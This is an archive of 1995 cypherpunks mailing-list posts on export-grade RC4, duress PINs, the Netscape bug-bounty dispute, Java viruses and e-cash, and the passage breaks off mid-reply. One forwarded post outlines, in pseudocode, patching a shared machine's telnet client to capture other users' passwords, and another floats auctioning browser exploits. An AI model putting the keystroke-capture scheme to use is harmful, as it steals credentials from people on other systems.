Subject: Re: The NSA Visits Compendium
In-Reply-To: <aca849e3050210043eb7@[199.125.128.5]>
Message-ID: <Pine.SOL.3.91.951017102059.25411F-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 16 Oct 1995, Peter Wayner wrote:

> [...]
> The most interesting thing that he mentioned was thatthe company had to 
> guarantee that the data would never be encrypted sequentially by two 
> _different_ algorithms. Apparently double encryption by 40-bit RC-4 was 
> okay, but using different algorithms was verboten.

Very interesting indeed.  With RC4 the bulk of the time is in key setup, 
so if they could do two setups in parallel then the total time to search 
a double-encrypted 40 bit keyspace would not be that great.

I suppose they could even 'weight' the number/power of processors assigned
to key setup such that the setup ran as fast as the trial decryptions,
then just proportionally increase their number until you get an acceptable
search time.  I know precious little about parallel processing so this
could be idle speculation. 

Can the same parallelisation be applied to other popular ciphers?


- Andy

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Tue, 17 Oct 95 08:22:13 PDT
To: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Subject: Re: mental cryptography
In-Reply-To: <199510171354.JAA13063@colon.cis.ohio-state.edu>
Message-ID: <Pine.3.89.9510171019.A61417-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 17 Oct 1995, Nathan Loofbourrow wrote:

> Well, then, perhaps on-line systems need to consider cash
> revocation in case of theft. Actually, this is a no-brainer: just
> exchange the cash for some new coin, and the old stuff goes
> invalid. Admittedly, this means a footrace for the mugger and the
> victim, so I guess the mugger is encouraged to knock you out cold.
 (snip)
> Duress PINs liberally sprinkled through the keyspace also drop the
> efficacy of brute-force PIN search for the thief.
> 
Besides (if you *really* want to be paranoid) you'd still have still have 
that cash on your hard drive and several other smart cards. Assuming you 
record which cash you put onto which smartcard onto your database or 
whatever, you'd exchange the stolen cash with the bank before brute force 
would succeed. Mugger still gets stuck with a duress code.

Either you have an automated paranoia setup that constantly changes 
your net worth into new currency (rejuvenating your cash against aging 
by factoring) or yeah, it really is better for the mugger to get rid of you. 
This also protects against the chinese lottery attacks some people on the 
list are trying to set up (assuming it really is ubiquitous by then).
It really might become a lottery with ecas. Factor PINs (assuming they're
small enough) and make real money.

This could easily be part of an automated trading program of the kind 
used by stock brokers. You'd probably use it anyway if the currency market 
were totally digital (low, if not no transaction fees) to compensate for 
currency fluctuations. Private currencies might be very volatile. Hell, if any 
of this succeeds, government currencies would be extremely volatile. 

Gold might start looking good again. (though platinum's better, almost all 
the world's platinum's in South Africa and odds are no one's gonna find any new
sources. Anyone know if I'm totally wrong? I'm no economist.)

(waiting to see if ala.usmc.mil is going to send more bouncemail)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Mon, 16 Oct 95 11:19:57 PDT
To: an402976@anon.penet.fi
Subject: Re: Netscape rewards are an insult
Message-ID: <v02120d04aca9a22a508b@[157.22.240.13]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:11 AM 10/16/95, RingZero wrote:
>======
>On Sat, 14 Oct 1995, Henry Wertz wrote:
>
>On Sat, 14 Oct 1995, Dr. Frederick B. Cohen wrote:
>
>>       The idea that Netscape (like Microsoft) thinks they can get free
>> testing services from all over the net by real experts just by offerring
>> a tee shirt is down right offensive.
>>
>>       I have a better idea.  How about an open market in break-in
>> software.  We crack Netscape and offer the crack code to the highest
>> bidder.  Bids start at US$25K per hole.  For the insult, Netscape has to
>> outbid the competition by a factor of 2 to get the details of the hole.
>> Here's how it works:
>*cut*
>     You know, this all seems kind of greedy to me.. It used to be people
>would find holes for *fun* and not for profit.  It's still possible to do
>that you know 8-).
>======
>
>It almost sounds like extortion, doesn't it?


I have to admit I'm a little surprised. I think there are a couple conflicting
dynamics here.

On the one hand, many people here see strengthening security and encryption
in use as a no-holds benefit. The more that is out there, the better it is,
and the more its in use, the better off things will be.

On the other hand, Netscape is a hot stock company. Its ok to work for
recognition, and to donate time for the betterment of the community even if
it profits others. (Eventually such things come around, which is the
classic value of a net reputation.) However, when sudden, large profits
hinge on your work, it is harder to take the philosophical route.

Its a tough thing. I can certainly see both sides.

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ@consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page  ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Tue, 17 Oct 95 08:32:41 PDT
To: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Subject: Duress codes
In-Reply-To: <199510171354.JAA13063@colon.cis.ohio-state.edu>
Message-ID: <Pine.3.89.9510171136.E61417-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 17 Oct 1995, Nathan Loofbourrow wrote:

> Duress PINs liberally sprinkled through the keyspace also drop the
> efficacy of brute-force PIN search for the thief.
Was there an actual protocol for doing this? (probabilistic maybe?)
Don't remember Schneier doing anything beyond just mentionning it. (ok I 
can't find the page number either, so I can't really complain).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiegoCA.ATTGIS.com>
Date: Tue, 17 Oct 95 11:35:56 PDT
To: cypherpunks@toad.com
Subject: San Diego Cypherpunks Physical Meeting
Message-ID: <199510171835.OAA02450@ncrhub5.attgis.com>
MIME-Version: 1.0
Content-Type: text/plain


San Diego Area CPUNKS symposium  Thursday, Oct 26, 1995

   Invitation to all Cypherpunks to join the San Diego crowd at "The Mission
Cafe & Coffee Shop" were I hope to get an update of Lance Cottrell's new
anonymous e-mail server, "mixmaster", exchange keys, and discuss other
topical subjects.

   Don't forget to bring your public key  fingerprint.  If you can figure
out how to get it on the back of a business card, that would be cool.  

Place: The Mission Cafe & Coffee Shop
       3795 Mission Bl in Mission Beach.
       488-9060


Time:1800

Their Directions:
	8 west to Mission Beach Ingram Exit
	Take west mission bay drive
	Go right on Mission Blvd.

	On the corner of San Jose and mission blvd.
	It is located between roller coaster and garnett.
	It's kind of 40s looking building...  funky looking 
        (their description, not mine)

They serve stuff to eat, coffee stuff, and beer.

See you there!

New guy, bring your fingerprint.

Drop me a note if you plan to attend.

     2
 -- C  --

                                        ...  __o
                                       ..   -\<,
Chris.Claborne@SanDiegoCA.ATTGIS.Com   ...(*)/(*).          CI$: 76340.2422
http://bordeaux.sandiegoca.attgis.com/
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Tue, 17 Oct 95 09:43:44 PDT
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: java flaw
In-Reply-To: <199510171504.IAA17210@blob.best.net>
Message-ID: <Pine.SUN.3.90.951017113942.26063A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


Ehh.. Lets just say that that article wsa not the most technicaly acurate.
And you are right it does not scan for viruses. 

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Tue, 17 Oct 1995, James A. Donald wrote:

> Even if one had genuine artificial intelligence, it would be impossible
> to detect all viruses, only particular viruses and classes of virus.
> 
> If Java is secure, virus scanning should be unnecessary, indeed 
> impossible, because there could be no code configuration capable
> of acting as a virus.
> 
> If virus scanning occurs, then it is possible to write a virus in Java,
> then Java is inherently insecure.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Tue, 17 Oct 95 01:01:47 PDT
To: Brad Shantz <bshantz@nwlink.com>
Subject: Re: Netscape rewards are an insult
In-Reply-To: <9510151627.AA15802@toad.com>
Message-ID: <Pine.SOL.3.91.951017113300.12098C-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 15 Oct 1995, Brad Shantz wrote:
> Whoops, wrong.  BETA does not mean code "they know crashes."  In fact 
> it is quite the opposite.  This is pre-release code that they are bug 
> fixing.  most of the catastrophic bugs, they probably know about.  A 
> BETA program is to increase the testing and quality assurance staff 
> to find all of the bugs they DON'T know about.  Then, they will have a 
> reasonable amount of time to fix those bugs before release.  It makes 
> for a much more stable product.

Well it took me 30 minutes to find my first repeatable 'core' dumping
bug in the v2.0beta when I started playing with it this morning.
How stable is that?  Mind you, the bug appears to be probably due to a 
missed variable assignment.
 
I have an idea about where to look for more bugs but I'll 
probably wait some time before I start looking in earnest, I suppose the 
challenge is to look for bugs in the final release version :-).

eric (who wants a 'I debuged netscape' Tshirt to go with his 'I hacked 
      netscape' Tshirt and his RSA yoyo :-)
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robin Felix <felix@delfin.com>
Date: Tue, 17 Oct 95 12:08:56 PDT
To: zoetrope@infinet.com
Subject: Re: 90%
Message-ID: <9510171910.AA02341@delfinsd.delfinsd.delfin.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:01 PM 10/12/95 -0400, zoetrope@infinet.com wrote:
>Can I ask a question....are you guys into cryptology for the interesting
>facts and knowledge or fer cracking unix codes and raising havoc?

Do you drive a car to go to work, go to school, or go to the beach?  Or
just, perhaps, because you enjoy tinkering with it?
--
Robin Felix; felix@delfin.com; felix@nosc.mil
619-291-2194(work), 619-291-5852(fax), 619-991-5081(alt)
http://www.delfinsd.delfin.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 17 Oct 95 09:15:06 PDT
To: jamesd@echeque.com (James A. Donald)
Subject: Re: java flaw
In-Reply-To: <199510171504.IAA17210@blob.best.net>
Message-ID: <9510171612.AA25185@all.net>
MIME-Version: 1.0
Content-Type: text


> 
> At 06:59 AM 10/17/95 UTC, jerry the golden retriever wrote:
> > A security feature in Java scans for viruses before activating the
> > applet.
> 
> I hope that this is false.
> 
> Even if one had genuine artificial intelligence, it would be impossible
> to detect all viruses, only particular viruses and classes of virus.
> 
> If Java is secure, virus scanning should be unnecessary, indeed 
> impossible, because there could be no code configuration capable
> of acting as a virus.
> 
> If virus scanning occurs, then it is possible to write a virus in Java,
> then Java is inherently insecure.

To be more precise, if there is programming, sharing, and transitive
information flow, viruses can reproduce and spread (as proven
mathematically in the mid-1980s).  Sice Java offers sharing of
programs and (for not at least) transitive information flow, viruses
are possible.

-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Martin Diehl" <mdiehl@dttus.com>
Date: Tue, 17 Oct 95 10:25:56 PDT
To: cypherpunks@toad.com
Subject: Re: Using deterministic programs to select private RSA keys.
Message-ID: <9509178139.AA813958011@cc2.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     norm@netcom.com(Norman Hardy) writes:
     
     Much has been said recently here about how to produce truly random 
     primes.
     [snip]
     The protocol is to accept a sequence of key strokes for printable 
     ASCII characters.
     [snip]
     
     I suggest that if you capture the time in microseconds between 
     keystrokes and insert the least significant 8 bits between the 
     corresponding characters (i. e. <letter1> <time2 - time1> <letter2> 
     <time3 - time2> <letter3> ... <letter nnn> <time until double CR - 
     time nnn>) and MD5 the set of values, the resulting "random" value 
     will be different for both people who type different input texts as 
     well as those people who type the same input text.
     
     It is important to be sure that you are accessing a true microsecond 
     clock (or other high resolution clock).  For example, in the IBM PC 
     architecture, the clock tic (basic time interrupt) is one per 18.2 
     milliseconds or 55 interrupts per second.  If you were using the clock 
     tic rate and a highly trained typist with a regular typing rate, the 
     interspersed time values might show a consistent set of values.  On 
     the other hand, use of a microsecond clock eliminates this problem.
     
     As regards the observation that MD5 produces only a 128 bit result, 
     you could call MD5 after each nn values (at least 16) have been 
     entered.  In that way a few lines of input and associated timing 
     values could easily generate a value of the same order of magnitude as 
     the number  of 1K primes.
      
     Martin G. Diehl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Westcan1@softnc1.softnc.com (West Canadian Graphics)
Date: Tue, 17 Oct 95 11:49:55 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
Message-ID: <9510171851.AA13486@softnc.com>
MIME-Version: 1.0
Content-Type: text/plain


::
Request-Remailing-To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult


> > Promoting the notion that hackers are earnestly attacking
> > Netscape and reporting its bugs increases its credibility to
> > the stock market porkers. Is that not why dear
> > all-too-attentive Jeff has been assigned duty on this list,
> > feeding peanuts to chimp hackers and champ newshacks?

Whoa!!

> I'm afraid you're a little out of line here.
> I've worked with Jeff at a couple different companies
> over the last 6 years.  Besides being a very good programmer
> he's also one of the people I consider the most resistant
> to corportate bullstuff (beleive me, we both got a lot of it at MicroUnity).
> I'm sure he's on this list because he thinks it's a good
> idea to pay attention to it.

Maybe he is, but I'd rather hear everyone speak for themself.  You can
speak for you.  And you can let Jeff speak for himself.  And I'd rather
that Netscape speak for itself, too.

Is Jeff or any of the other netscape posters here officially??

Or are they here, just out of personal curiosity (without their employers
knowledge, I mean ...) cause they have a whole lot of spare time on their
hands to learn about cryptography and security.

I wish one of them (or Netscape) would make an official comment to make
sure that the record is straight, and that there is no mis-reporting.

> What the hell is wrong with you people?  Up 'til a few months
> ago, the oft-heard refrain on cipherpunks was "why won't the
> software vendors listen to us?"... now they're listening,

Yep, they seem to be listening.  They just don't seem to be talking.

Can someone say something, please??  Is it true that:

        - Netscape has known about this problem since last week's
          scathing public attack and demonstration of the problem
          which included sample code posted to the Internet??

        - If you run and use a Netscape client, that any machine
          anywhere in the world if it's on the Net could retrieve
          all of the files off of your hard drive or LAN??

          Or even worse ... erase files on your Hard drive and
          wipe you out??

        - Even if your machine is behind a firewall or proxy server,
          that there is no protection??  That you can't do anything??

Can someone comment, please??


          (Carbon copy sent to: postmaster@netscape.com,
                                cypherpunks@toad.com,
                                cert@cert.org)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 17 Oct 95 09:50:44 PDT
To: cypherpunks@toad.com
Subject: NOT_100
Message-ID: <199510171650.MAA26966@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New Yorker of October 23 reports on the "Supernote,"
   a perfect counterfeit $100-bill allegedly being used for
   economic terrorism.

      The Supernote had surfaced around 1990 and originated in
      the Middle East. It was no ordinary counterfeit. The
      workmanship was extraordinary. When a sample first
      arrived at the Secret Service's laboratory, a top
      technical analyst "examined it the way he has every
      other counterfeit note in the world, and called it
      genuine." Most alarming of all, the Supernote was so
      well engineered that it could fool currency scanners at
      the nation's twelve Federal Reserve banks.

      Today, the Supernote remains one of the longest unsolved
      counterfeiting cases in the modern history of the Secret
      Service, and it has begun to undermine international
      confidence in United States currency.

      The Treasury, taking its cue from the Federal Reserve,
      has a difficult time regarding counterfeiting, even on
      a very large scale, as a macroeconomic problem, because
      cash is a relatively small percentage of the total money
      supply. Wire transfers, checks, and credit-card
      transactions, after all, run into the trillions.
      Counterfeiting becomes significant to the Fed only if it
      undermines confidence in the dollar.

      Dozens of interviews with high-level insiders left the
      impression that the Federal Reserve and the Treasury
      don't fear the Supernote itself as much as they fear a
      confidence problem that might result if they publicly
      acknowledge it and countenance a large-scale
      investigation. (As one expert on international terrorism
      who has looked into the Supernote puts it, "If the note
      is that nearly perfect, it doesn't exist.")


   NOT_100  (30 kb in 2 parts)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@cs.monash.edu.au>
Date: Mon, 16 Oct 95 20:17:14 PDT
To: s1018954@aix2.uottawa.ca
Subject: Re: Elementrix Press Release
In-Reply-To: <Pine.3.89.9510112226.A75036-0100000@aix2.uottawa.ca>
Message-ID: <199510170316.NAA10771@molly.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

s1018954@aix2.uottawa.ca wrote:

> On Thu, 12 Oct 1995, Jiri Baum wrote:
> 
> > Still, who knows what surprises QM can provide?
> > 
> > In which case calling it a "telepathic key exchange scheme" might
> > be quite appropriate :-)
> 
> I don't think that's what was meant. After all, using telepathy as a 
> secure channel, you'd still need a comm protocol.

Not really, you can use the raw bitstream as OTP. (Which is probably not
enough to warrant calling it a protocol, maybe protocolette :-)

> The last time I checked
> protocols and algorithms are one and the same. Since elementrix doesn't use
> algorithms, we shouldn't defame them by claiming they've invented secure
> telepathy.        

Well, you could claim that what they are using is not an algorithm since
it won't run on a Turing machine. At that stage you probably toss the
Church-Turing thesis out the window and get yourself a proper definition
of "algorithm".

> Now wouldn't that be interesting to patent?

Gives a new meaning to the phrase "subliminal channels" :-)

> (One wonders if elementrix employees occasionally indulge in guilty 
> glances at Knuth and Sedgewick without their bosses' knowledge.)

Well, wouldn't the bosses give them mind-scans to avoid this possibility?

Sorry, I forgot, Psi Corps doesn't allow that.


Jiri
- --
<jirib@cs.monash.edu.au>     <jiri@melb.dialix.oz.au>     PGP 463A14D5

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMIMgDixV6mvvBgf5AQEvnQP/dBeNDgbaz23cMhii0yWzDhnAcL+VLmJw
x2x85A35IlSvblSmb647lYj/Bl1k6zpKZkpz+MKrtvh6psy3lTl/tWe2DXzXcoRk
nVwJC5vWCRyVTDMIhRlIoUkbx4QnKVDy1awHWYhIJ4Ssbj6c3G+XPrdvH8LxcSSb
BhxJL63Cp74=
=MDDD
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Blossom <eb@comsec.com>
Date: Tue, 17 Oct 95 15:13:39 PDT
To: cypherpunks@toad.com
Subject: [burt@RSA.COM: NSA recommendation on CAPIs]
Message-ID: <199510172028.NAA26789@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


Date: Tue, 17 Oct 95 10:07:20 PDT
From: burt@RSA.COM (Burt Kaliski)
To: pkcs-11-dev@RSA.COM
Subject: NSA recommendation on CAPIs
Sender: pkcs-11-dev-request@RSA.COM

Greetings --

In case you haven't seen it, NSA has produced a nice
report on cryptogaphic APIs, available through

  http://www.omg.org/public-doclist.html

The report compares GSSAPI, GCSAPI and Cryptoki, and
recommends the use of each one in various applications.

-- Burt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: baum@apple.com (Allen J. Baum)
Date: Tue, 17 Oct 95 14:03:04 PDT
To: cypherpunks@toad.com
Subject: Yardley's 1st ed. "Black Chamber" $25+
Message-ID: <v02120d08aca9ca600cea@[17.255.11.191]>
MIME-Version: 1.0
Content-Type: text/plain


I found one in a bookstore. I didn't buy it, but I'll go back and get it &
ship it if someone is interested.

**************************************************
* Allen J. Baum              tel. (408)974-3385  *
* Apple Computer, MS/305-3B  fax  (408)974-0907  *
* 1 Infinite Loop                                *
* Cupertino, CA 95014        baum@apple.com      *
**************************************************







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: williams@va.arca.com (Jeff Williams)
Date: Tue, 17 Oct 95 08:24:53 PDT
To: cypherpunks@toad.com
Subject: Re: Security Spectra
Message-ID: <1665990655.62370147@va.arca.com>
MIME-Version: 1.0
Content-Type: text/plain


P.J. Ponder writes:

> In your recent post to the cypherpunks mailing list you proposed a 
> taxonomy of security weaknesses and vulnerabilities, adding that these 

Please watch your attribution.  Vlad Nuri proposed this rating scheme.

> The whole idea of categorizing or ranking holes and vulnerabilities ab 
> intitio, outside of their contextual application to a real system is not 
> very helpful.  Systems vary so widely in their criticalities, 
> sensitivities, costs, etc., that each of your pre-defined categorized 
> weaknesses would have to be rejudged - in the context of the system being 
> analyzed - to determine how, and to what extent it could effect the system.

I absolutely agree with you on this point.  I'll point out again that this
is the same problem as creating a rating scheme for the security of
*products*.

> The standard approach as I understand it is to analyze the system against
> all the known vulnerabilities and attempt to measure (maybe only
> qualitatively) the risks associated with the vulnerabilities.

It is popular these days to jump on the risk assessment bandwagon and
forget about assurance.  This occurs because people think risk assessment
is a quick fix that you can do after the system is built and configured.
Some holes cannot be patched.

--Jeff Williams  <mailto:williams@arca.com>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Date: Tue, 17 Oct 95 11:21:02 PDT
To: cypherpunks@toad.com
Subject: DalSemi: Add-Only Memory for Storage of Digital Cash
Message-ID: <199510171820.OAA24348@colon.cis.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


A press release breezed through the list a while back about some
"decoder rings" -- basically, a nonvolatile RAM chip embedded in a
Jostens ring.

On further inspection, it looks to be a superior product to the
DataKey products I remember seeing about ten years ago, targeted at
this same sort of niche. The part in question is much smaller -- it
fits in a ring, after all, or on the usual sorts of key fobs and
employee badges -- and establishing electrical contact to transceive
data is trivial.

Cypherpunks relevance? Twofold. One, the Touch MultiKey
(ftp://ftp.dalsemi.com/pub/datasheets/1991.ps), which promises to hold
three 384 bit blocks under 64-bit passwords. The device will transmit
the stored data under the correct password, and "random bits" under
all other passwords. No crypto here, though, just a simple on-chip
comparison with a stored password. So I assume the determined opponent
with physical access can extract the info; but better that than store
your private key on a publically accessible machine, no?

Secondly, an app note: "Use of Add-Only Memory for Secure Storage of
Monetary Equivalent Data" (ftp://ftp.dalsemi.com/pub/datasheets/app84.ps).
A creative idea based on the peculiar nature of the EPROMs* that are
also available in this form factor. In particular, one bits may be
burned to zeros, but not vice versa; so why not burn particular bits
to indicate credits and debits?

Knowing that this scheme depends on keeping an attacker from guessing
which bits to burn, they use the unique serial number to uniquely
permute the bits, so that an attacker is as likely to burn a "debit"
bit as a "credit", and far likelier to burn out-of-sequence so that
the monkey business is apparent to any vendor.

And there's another item of note: each chip has a unique, etched,
machine-readable serial number. What are the bets that Dallas
Semiconductor can tell you who purchased that chip? Well, so much for
an anonymous payment scheme based on *this* product.

Still, if I had to choose a place to keep a secret key, I'd choose my
knuckle over my key ring, let alone a floppy disk, PDA, or portable
computer.

nathan
* Gee, back in my day EPROMs were Eraseable; these folks mean instead
  to indicate an Electrically Programmable chip, which sounds like a
  good old PROM to me. Ahhh, acronyms...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 17 Oct 95 12:19:12 PDT
To: Chris Claborne <cypherpunks@toad.com
Subject: Re: San Diego Cypherpunks Physical Meeting
In-Reply-To: <199510171835.OAA02450@ncrhub5.attgis.com>
Message-ID: <9510171918.AA01407@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain




>   Don't forget to bring your public key  fingerprint.  If you can figure
>out how to get it on the back of a business card, that would be cool.  

How about a combined message digest/url barcoded into the card?

Then standard scanner type software could be programmed to pick it up.

So how to get 128 bits + ??? for the URL onto a card?

Limited resoultion here...


If someone has a proposal I can circulate it through to the W3C members. I'm 
sure there would be interest.
	Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 17 Oct 95 12:46:56 PDT
To: cypherpunks@toad.com
Subject: BeBox Security Hole?
Message-ID: <v02120d06aca9a270c12d@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



This looks like fun...

Cheers,
Bob Hettinga


>Date: Mon, 16 Oct 1995 23:07:58 -0700
>From: crawford@scruznet.com (Michael D. Crawford)
>To: semper.fi@abs.apple.com, dev@be.com
>Subject: Re: BeBox development questions and answers
>Message-ID: <199510170607.XAA06319@scruz.net>
>
>Jonah Benton asked Melissa Rogers about security:
>
>>>>are there ways of excluding certain users from certain parts of the file
>>>>system?
>>>No
>>>>
>>>>i believe you support telnet- can multiple users telnet in at once?
>>>>
>>>Yes
>
>The answers to these two questions suggests the existence of the following
>serious security problem, which can cause breaches on any other machine on
>the network.  This is a time-honored way for hackers to bust into machines
>on the Internet.
>
>do{
>   telnet to an Internet host that does not have adequate security
>
>   Patch the telnet client on the Be box to save keystrokes into a file
>
>   Log out
>
>   Wait a couple weeks
>
>   Telnet back in, retrieve the file.
>
>   Now you have the host names, account names, and passwords for several other
>   machines
>}while ( Internet != destroyed );
>
>Would someone from Be care to clarify?
>
>This isn't exactly on-topic for this list, but it is a serious problem.
>It's been going on for years on other OS's.
>
>Mike
>
>Michael D. Crawford             | I use anonymous digital cash from DigiCash.
>crawford@scruznet.com           | Join the e-Cash trial at:
>http://www.scruz.net/~crawford/ | http://www.digicash.com
>

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 17 Oct 95 12:46:56 PDT
To: cypherpunks@toad.com
Subject: e$: Reuters Smells the Coffee
Message-ID: <v02120d03ac526025ff8b@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Mime-Version: 1.0
Date: Sat, 12 Aug 1995 00:01:58
From: infocker@megaweb.com
Sender: infocker@megaweb.com () (from unknown.aol.com 205.188.2.111)
To: www-buyinfo@allegra.att.com
Subject: Cyber Economy--Govts. Cannot Control

Thought Mr. Hettinga might particularly appreciate this perspective.

Jim Rapp
Alexandria, Virginia
"give me more info"

As always, do not send the copyright police after me.


LONDON - Growing business on the Internet computer network could
allow companies and individuals to avoid taxes and build up a black
economy increasingly out of range of government intervention and
regulation, computer experts say.

People will be able to download computer programs from
Philadelphia to Paris or buy books from Madrid in Manila, avoiding
export or import duties and sales taxes, as well as bypassing
government trade statistics.

"Electronic purses," loaded from banks down telephone lines,
could become the favored means of payment for fast, anonymous and
secure payments, with currencies of choice becoming more exotic,
depending on what is acceptable to dealmakers.

"Cyberdollars," expatriate U.S. currency zapping across telephone
lines between computers, could add to problems posed for authorities
by existing funds outside national borders.

Deals on the Internet are mainly completed by credit card at
present. But electronic purses could lead to a buildup of currency
beyond the control of governments and central banks, further limiting
their influence on economies and markets and making traditional
monetary tools like interest rates less effective.

"Online business will involve much more economic activity outside
the control and ambit of government," Madsen Pirie, director of the
Adam Smith Institute, a right-wing British think-tank, told Reuters.

"Government will have to limit its ambitions. Just like
governments in the modern world find it difficult to have exchange
control; they can't control billions of dollars of cash sloshing
around foreign exchange markets," he said.

Business is fairly modest now but will increase exponentially,
Pirie forecasts.

The U.S. Commerce Department has said electronic cash will
account for 20 percent of U.S. purchases by 2005, up from just over 4
percent last year and compared with just over 16 percent forecast by
2000.

Leaders of the information technology industry believe that the
embryonic stage is over and are wary of government action, which they
feel might inhibit growth.

Analysts reckon that any attempt to regulate cybermarkets is
likely to be futile.

The Adam Smith Institute's Pirie agrees, predicting: "Governments
will fail if they try to control this. They always have when they try
to hold back the way history is going."

- - - - -

Copyright, Reuters America Inc. All rights reserved
--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 17 Oct 95 12:52:27 PDT
To: cypherpunks@toad.com
Subject: re: e$: Reuters Smells the Coffee
Message-ID: <v02120d00aca9b9a7fbdb@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Sorry, folks.

Eudora got the best of me there...

Sorry for the bandwidth...

Cheers,
Bob

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 17 Oct 95 16:27:08 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <9510171851.AA13486@softnc.com>
Message-ID: <30843AD9.4101@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


West Canadian Graphics wrote:
> Is Jeff or any of the other netscape posters here officially??

  I am not an official spokesperson of netscape.  What I post here
is either my opinion, my interpretation of netscape's public statements
(press releases), or my interpretation of the sentiments of my co-workers.
Obviously management know that I do spend some time reading and writing
messages on cypherpunks, but I've never been told to do it or to stop
doing it.

> Or are they here, just out of personal curiosity (without their employers
> knowledge, I mean ...) cause they have a whole lot of spare time on their
> hands to learn about cryptography and security.

  I'm here to learn and to contribute, which I think is why most
people are here.

>         - Netscape has known about this problem since last week's
>           scathing public attack and demonstration of the problem
>           which included sample code posted to the Internet??

  Which problem are you talking about?

>         - If you run and use a Netscape client, that any machine
>           anywhere in the world if it's on the Net could retrieve
